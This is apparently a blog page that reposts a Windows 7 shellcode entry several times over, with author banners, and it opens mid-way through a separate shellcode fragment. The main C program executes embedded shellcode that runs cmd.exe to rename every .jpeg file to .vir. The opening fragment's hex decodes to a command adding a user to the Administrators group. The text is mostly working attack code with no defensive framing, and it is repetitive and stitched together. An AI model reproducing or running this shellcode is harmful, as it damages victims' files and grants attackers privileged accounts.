"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
Win32 / Windows7 Sp1 - rename .jpeg to .vir
# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Made by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/Rats Crew \/ TheCod3r \/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Renaming all .jpeg files to .vir files");
return 0;
}
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Made by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/Rats Crew \/ TheCod3r \/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Renaming all .jpeg files to .vir files");
return 0;
}
Win32 / Windows7 Sp1 - rename .jpeg to .vir
# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Made by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/Rats Crew \/ TheCod3r \/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Renaming all .jpeg files to .vir files");
return 0;
}
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Made by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/Rats Crew \/ TheCod3r \/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Renaming all .jpeg files to .vir files");
return 0;
}
Subscribe to:
Posts (Atom)